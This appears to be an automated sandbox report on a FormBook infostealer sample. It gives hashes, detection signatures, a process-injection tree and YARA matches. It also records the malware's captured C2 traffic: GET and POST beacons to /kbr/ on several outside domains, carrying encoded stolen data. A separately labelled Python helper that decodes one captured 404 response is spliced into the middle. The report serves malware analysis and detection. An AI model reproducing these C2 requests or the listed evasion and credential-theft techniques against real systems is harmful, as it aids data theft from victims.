
Analysis Report sample.exe

Overview

General Information

Sample Name: sample.exe
Analysis ID: 285284
MD5: fa2b81bb3c092af37132e48f36fa92c3
SHA1: 715b71b3e7393c7bd1aa50a824e32b6408b6cbae
SHA256: 4f90d42980450652ef19fe55ebea9e68683b4d29027900dcbeb5c26d298318fc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • sample.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: FA2B81BB3C092AF37132E48F36FA92C3)
    • sample.exe (PID: 6792 cmdline: C:\Users\user\Desktop\sample.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 3600 cmdline: /c del 'C:\Users\user\Desktop\sample.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • user8pl8ft.exe (PID: 1016 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 6588 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
        • user8pl8ft.exe (PID: 1548 cmdline: 'C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe' MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 5544 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 5572 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
        • ipconfig.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • autochk.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • colorcpl.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
1.2.sample.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.sample.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
1.2.sample.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
28.2.user8pl8ft.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
28.2.user8pl8ft.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: sample.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exe | Avira: detection malicious, Label: TR/AD.Swotter.sxyui
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exe | Virustotal: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exe | ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: sample.exe | ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: sample.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.sample.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.user8pl8ft.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 31.2.user8pl8ft.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\sample.exe | Code function: 4x nop then pop edi | 1_2_00416BE2
Source: C:\Users\user\Desktop\sample.exe | Code function: 4x nop then pop edi | 1_2_0040E42E
Source: C:\Users\user\Desktop\sample.exe | Code function: 4x nop then pop edi | 1_2_00416C36
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 3_2_02FE6C51
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 3_2_02FDE42E
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=gJ1Bg3cRUnF3Tz72382304/qkwZXcYyoTiB0AKQqMrhmjr9Py6IZndCYQUtN235WiBmz&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.theplayhousecafe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=YUpLZ7qRZuPzGYNdcL/xU2BlEd7IXc2AXan4cBVO0XX3iA8cEVVOkbsZmghrOj5uDZzx&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.cape-winelands.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | ASN Name: xneeloZA
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: PEGTECHINCUS
Source: global traffic | HTTP traffic detected: POST /kbr/ HTTP/1.1 | Host: www.theplayhousecafe.com | Connection: close | Content-Length: 414 | Cache-Control: no-cache | Origin: http://www.theplayhousecafe.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.theplayhousecafe.com/kbr/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
IDKDM4yx=or57~TRrKXVJPDGcu5PXjNPViDheaJXqWmIDGdMpLrVcjvpE(JV8l6(mH29DpDZh6ATfxKLECfkCAC0_F4fBuKF0AYFbPs~tdl(lkN6wkF5QszL-h15Ply90KOUe5j(ceKu96t5K9z3sqbC2HVikbPP2TyRUAvnK6T2tmYhiaB00PYV9ZX1NkVtCBrM-41tZ11DXPd~WX_E6bBRYv94URU0uPvfMPMEHYErI94fk1g0WYAX7F1QUK0Db9o1IubfcDvtX6WSHyfLD(47zpRj0FIqZN0(r6itzaFLAQrd27XDCtSFwOLIvStG5M6J7UkGnsmdYoGd3xsgjZHucaTJR6MbBuvejJ5drEop2e9MSuRaxpmizV0ougJ(AWcvVDR8XdNzupM38~eAplL9HYw).
Source: global traffic | HTTP traffic detected: POST /kbr/ HTTP/1.1 | Host: www.theplayhousecafe.com | Connection: close | Content-Length: 165402 | Cache-Control: no-cache | Origin: http://www.theplayhousecafe.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.theplayhousecafe.com/kbr/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /kbr/ HTTP/1.1 | Host: www.cape-winelands.info | Connection: close | Content-Length: 414 | Cache-Control: no-cache | Origin: http://www.cape-winelands.info | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cape-winelands.info/kbr/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
IDKDM4yx=Q2lxHcu1QvH8Zu43JfqXCBF5HNvia8~JJPH8KQds4T3IjFUPKkAHh9hu~Q5bPgMHO7KeYZ2oJ8KqOF3-r6AJQ0l6ebXztJ2KiN15Df9NMtGu~xrsYtUT947IVcix3MpGA3YazcLy3dIbXYNcIWGpPtodoq1x(Tbs4u(bgeNHoLIo2HeYeo~WXv3wjveeWE(oT-r5eD2He-SpFJ2vvVmfSHg8Aw0gwsE3lKZSAOG5axNJ(D6h50YuCH66qYlkmSDw1HsIKNNzxLZeaqXSiHlASI9AF5zGHP3c3qvR2cCtMmU1C7bNup(UcbRTltkvx4qKJgfuG27jQUU-FttQbgwH9ogXUSGwyOYlf2Cz5i68TZNQwtuNGClFzF~5(NmShcN-mqtXR0R-uKhhNPnAHg).).
Source: global traffic | HTTP traffic detected: POST /kbr/ HTTP/1.1 | Host: www.cape-winelands.info | Connection: close | Content-Length: 165402 | Cache-Control: no-cache | Origin: http://www.cape-winelands.info | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cape-winelands.info/kbr/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.broadcastsfromthebrainradio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=gJ1Bg3cRUnF3Tz72382304/qkwZXcYyoTiB0AKQqMrhmjr9Py6IZndCYQUtN235WiBmz&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.theplayhousecafe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbr/?IDKDM4yx=YUpLZ7qRZuPzGYNdcL/xU2BlEd7IXc2AXan4cBVO0XX3iA8cEVVOkbsZmghrOj5uDZzx&CXO03=fTjPtjUxadQPaH HTTP/1.1 | Host: www.cape-winelands.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.broadcastsfromthebrainradio.com
Source: unknown | HTTP traffic detected: POST /kbr/ HTTP/1.1 | Host: www.theplayhousecafe.com | Connection: close | Content-Length: 414 | Cache-Control: no-cache | Origin: http://www.theplayhousecafe.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.theplayhousecafe.com/kbr/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii:
IDKDM4yx=or57~TRrKXVJPDGcu5PXjNPViDheaJXqWmIDGdMpLrVcjvpE(JV8l6(mH29DpDZh6ATfxKLECfkCAC0_F4fBuKF0AYFbPs~tdl(lkN6wkF5QszL-h15Ply90KOUe5j(ceKu96t5K9z3sqbC2HVikbPP2TyRUAvnK6T2tmYhiaB00PYV9ZX1NkVtCBrM-41tZ11DXPd~WX_E6bBRYv94URU0uPvfMPMEHYErI94fk1g0WYAX7F1QUK0Db9o1IubfcDvtX6WSHyfLD(47zpRj0FIqZN0(r6itzaFLAQrd27XDCtSFwOLIvStG5M6J7UkGnsmdYoGd3xsgjZHucaTJR6MbBuvejJ5drEop2e9MSuRaxpmizV0ougJ(AWcvVDR8XdNzupM38~eAplL9HYw).
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/8.5 | X-Powered-By: ASP.NET | Date: Mon, 14 Sep 2020 19:10:28 GMT | Connection: close | Content-Length: 1163
Source: explorer.exe, 00000002.00000000.376832424.0000000007C3C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: sample.exe, 00000000.00000002.362051090.0000000002AD1000.00000004.00000001.sdmp, user8pl8ft.exe, 00000019.00000002.548157674.0000000003271000.00000004.00000001.sdmp, user8pl8ft.exe, 0000001A.00000002.562366464.0000000002A01000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000002.624955816.0000000002280000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.376917288.0000000007CC8000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: wlanext.exe, 00000003.00000002.628152195.0000000003C69000.00000004.00000001.sdmp | String found in binary or memory: http://www.willowbeemasks.com
Source: wlanext.exe, 00000003.00000002.628152195.0000000003C69000.00000004.00000001.sdmp | String found in binary or memory: http://www.willowbeemasks.com/kbr/
Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: wlanext.exe, 00000003.00000002.625486113.0000000002F98000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.624269201.0000000000CDF000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sample.exe, 00000000.00000002.361713634.0000000000EAA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
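The 404 response in the network rows above is shown only as a raw hex dump, which hides what the contacted host actually served. The script below is an added example and is not part of the Joe Sandbox report. It embeds the status line, the headers and the beginning of the Data Raw bytes copied from that row (cut after the </title> element, since the report truncates the dump anyway), picks the charset out of the HTML meta tag because the Content-Type header carries none, decodes the body and compares the dumped length with the declared Content-Length. The decoded title is the stock Chinese-locale IIS message for "404 - File or directory not found.", which says the host answered with its generic error page rather than with panel content.

```python
import re

# Status line and headers copied from the report row above.
STATUS_LINE = "HTTP/1.1 404 Not Found"
HEADERS = {
    "Content-Type": "text/html",
    "Server": "Microsoft-IIS/8.5",
    "X-Powered-By": "ASP.NET",
    "Date": "Mon, 14 Sep 2020 19:10:28 GMT",
    "Connection": "close",
    "Content-Length": "1163",
}

# Beginning of the "Data Raw" hex from the same row, cut after </title>.
# The report truncates the dump itself, so the body is never complete here.
RAW_HEX = (
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 "
    "20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 "
    "2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 "
    "74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 "
    "33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 "
    "68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d "
    "22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 "
    "74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c "
    "65 3e"
)

CHARSET_RE = re.compile(rb"charset=([A-Za-z0-9_-]+)", re.I)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.S | re.I)


def parse_raw(hex_dump):
    """Turn the report's space separated 'Data Raw' field into bytes."""
    return bytes.fromhex(hex_dump)


def decode_body(body, content_type):
    """Charset from the Content-Type header first, then from the HTML meta
    tag, then latin-1 so that a hostile or broken body never raises."""
    m = CHARSET_RE.search(content_type.encode()) or CHARSET_RE.search(body)
    charset = m.group(1).decode().lower() if m else "latin-1"
    try:
        return charset, body.decode(charset)
    except (LookupError, UnicodeDecodeError):
        return "latin-1", body.decode("latin-1")


def summarize(status_line, headers, hex_dump):
    """What the server sent: status, software, charset, page title and
    whether the sandbox dump covers the whole declared body."""
    body = parse_raw(hex_dump)
    charset, text = decode_body(body, headers.get("Content-Type", ""))
    title = TITLE_RE.search(text)
    declared = int(headers.get("Content-Length", "0"))
    return {
        "status": int(status_line.split()[1]),
        "server": headers.get("Server"),
        "charset": charset,
        "title": title.group(1).strip() if title else None,
        "declared_length": declared,
        "dumped_length": len(body),
        "truncated": len(body) < declared,
    }


if __name__ == "__main__":
    for key, value in summarize(STATUS_LINE, HEADERS, RAW_HEX).items():
        print(f"{key:16} {value}")
```

The same decode applies to any Data Raw field in a Joe Sandbox report; the charset fallback chain matters because C2 responses are often served from hosts whose locale is not the analyst's, and a blind UTF-8 decode would throw away exactly the part of the page that identifies the server.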

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY
